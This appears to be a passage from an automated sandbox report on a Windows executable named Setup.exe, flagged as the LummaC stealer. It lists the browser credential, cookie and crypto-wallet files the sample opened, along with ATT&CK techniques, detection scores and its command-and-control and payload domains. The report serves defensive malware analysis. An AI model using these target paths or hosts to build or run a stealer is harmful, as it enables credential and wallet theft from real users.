Source: Setup.exe, 00000000.00000003.2202431157.0000000000765000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Setup.exe, 00000000.00000003.2202807145.000000000071C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb3
Source: Setup.exe, 00000000.00000003.2219391647.0000000000766000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
Source: Setup.exe, 00000000.00000003.2202807145.0000000000734000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Setup.exe, 00000000.00000003.2202807145.000000000071C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\Setup.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\Desktop\Setup.exe | Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: Yara match | File source: Process Memory Space: Setup.exe PID: 6576, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: Setup.exe PID: 6576, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK matrix (one column per tactic; the number in parentheses is the count of matched signatures for that technique):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (12) | DLL Side-Loading (1) | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (21) | OS Credential Dumping (2) | Security Software Discovery (221) | Remote Services | Archive Collected Data (1) | Encrypted Channel (11) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Command and Scripting Interpreter (2) | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Deobfuscate/Decode Files or Information (1) | LSASS Memory | Virtualization/Sandbox Evasion (21) | Remote Desktop Protocol | Data from Local System (41) | Ingress Tool Transfer (1) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | PowerShell (1) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information (1) | Security Account Manager | Process Discovery (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (3) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | DLL Side-Loading (1) | NTDS | File and Directory Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (114) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | System Information Discovery (22) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact

Source | Detection | Scanner | Label | Link
Setup.exe | 21% | ReversingLabs | Win32.Trojan.Generic |
Setup.exe | 20% | Virustotal | | Browse
No Antivirus matches
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
https://displayclubby.sbs/) | 0% | Avira URL Cloud | safe |
https://displayclubby.sbs/ | 0% | Avira URL Cloud | safe |
https://displayclubby.sbs/api | 0% | Avira URL Cloud | safe |
https://displayclubby.sbs:443/api | 0% | Avira URL Cloud | safe |
displayclubby.sbs | 0% | Avira URL Cloud | safe |
https://klipvumisui.shop/int_clp_sha.txtp | 100% | Avira URL Cloud | malware |
https://displayclubby.sbs/apiJg | 0% | Avira URL Cloud | safe |
https://klipvumisui.shop/int_clp_sha.txtds | 100% | Avira URL Cloud | malware |
https://displayclubby.sbs/&&8 | 0% | Avira URL Cloud | safe |
https://displayclubby.sbs/q | 0% | Avira URL Cloud | safe |
https://cegu.shop/8574262446/ph.txt1eNI | 100% | Avira URL Cloud | malware |
https://cegu.shop/Q | 100% | Avira URL Cloud | malware |
https://displayclubby.sbs/api; | 0% | Avira URL Cloud | safe |
https://cegu.shop/8574262446/ph.txtMhNf | 100% | Avira URL Cloud | malware |
https://cegu.shop/8574262446/ph.txtebKit/537.36 | 100% | Avira URL Cloud | malware |
https://displayclubby.sbs/api$ | 0% | Avira URL Cloud | safe |
https://cegu.shop/8574262446/ph.txtl | 100% | Avira URL Cloud | malware |
              NameIPActiveMaliciousAntivirus DetectionReputation
              cegu.shop
              185.161.251.21
              truefalse
                high
                displayclubby.sbs
                104.21.64.1
                truetrue
                  unknown
Name | Malicious | Antivirus Detection | Reputation
https://displayclubby.sbs/api | true | Avira URL Cloud: safe | unknown
displayclubby.sbs | true | Avira URL Cloud: safe | unknown
rabidcowse.shop | false | | high
wholersorie.shop | false | | high
cloudewahsj.shop | false | | high
noisycuttej.shop | false | | high
nearycrepso.shop | false | | high
https://cegu.shop/8574262446/ph.txt | false | | high
framekgirus.shop | false | | high
tirepublicerj.shop | false | | high
abruptyopsn.shop | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
185.161.251.21 | cegu.shop | United Kingdom | 5089 | NTLGB | false
104.21.64.1 | displayclubby.sbs | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1584525
Start date and time: 2025-01-05 18:57:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Setup.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@2/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 8
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240s for sample files taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Setup.exe, PID 6576 because there are no executed functions
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
12:58:14 | API Interceptor | 8x Sleep call for process: Setup.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.161.251.21 | Set-up.exe | malicious | LummaC |
185.161.251.21 | setup.exe | malicious | LummaC |
185.161.251.21 | 'Set-up.exe | malicious | LummaC |
185.161.251.21 | Set-up.exe | malicious | LummaC |
185.161.251.21 | SET_UP.exe | malicious | LummaC |
185.161.251.21 | Setup.exe | malicious | LummaC |
185.161.251.21 | Setup.exe | malicious | LummaC |
185.161.251.21 | Full_Setup.exe | malicious | LummaC |
104.21.64.1 | SH8ZyOWNi2.exe | malicious | CMSBrute | adsfirm.com/administrator/index.php
104.21.64.1 | PO2412010.exe | malicious | FormBook | www.bser101pp.buzz/v89f/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
cegu.shop | Set-up.exe | malicious | LummaC | 185.161.251.21
cegu.shop | setup.exe | malicious | LummaC | 185.161.251.21
cegu.shop | 'Set-up.exe | malicious | LummaC | 185.161.251.21
cegu.shop | Set-up.exe | malicious | LummaC | 185.161.251.21
cegu.shop | SET_UP.exe | malicious | LummaC | 185.161.251.21
cegu.shop | Setup.exe | malicious | LummaC | 185.161.251.21
cegu.shop | Setup.exe | malicious | LummaC | 185.161.251.21
cegu.shop | Full_Setup.exe | malicious | LummaC | 185.161.251.21
Match | Associated Sample Name / URL | Detection | Threat Name | Context
NTLGB | Set-up.exe | malicious | LummaC | 185.161.251.21
NTLGB | setup.exe | malicious | LummaC | 185.161.251.21
NTLGB | 'Set-up.exe | malicious | LummaC | 185.161.251.21
NTLGB | Set-up.exe | malicious | LummaC | 185.161.251.21
NTLGB | SET_UP.exe | malicious | LummaC | 185.161.251.21
NTLGB | Setup.exe | malicious | LummaC | 185.161.251.21
NTLGB | Setup.exe | malicious | LummaC | 185.161.251.21
NTLGB | Full_Setup.exe | malicious | LummaC | 185.161.251.21
NTLGB | momo.mips.elf | malicious | Mirai | 82.18.222.135
NTLGB | momo.arm.elf | malicious | Mirai | 82.17.192.171
CLOUDFLARENETUS | Set-up.exe | malicious | LummaC | 172.67.208.58
CLOUDFLARENETUS | Set-up.exe | malicious | LummaC Stealer | 188.114.96.3
CLOUDFLARENETUS | 'Set-up.exe | malicious | LummaC | 172.67.178.174
CLOUDFLARENETUS | setup.exe | malicious | LummaC | 172.67.163.221
CLOUDFLARENETUS | 'Set-up.exe | malicious | LummaC | 188.114.96.3
CLOUDFLARENETUS | setup.msi | malicious | Unknown | 104.21.32.1
                                                                                                              Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.21.63
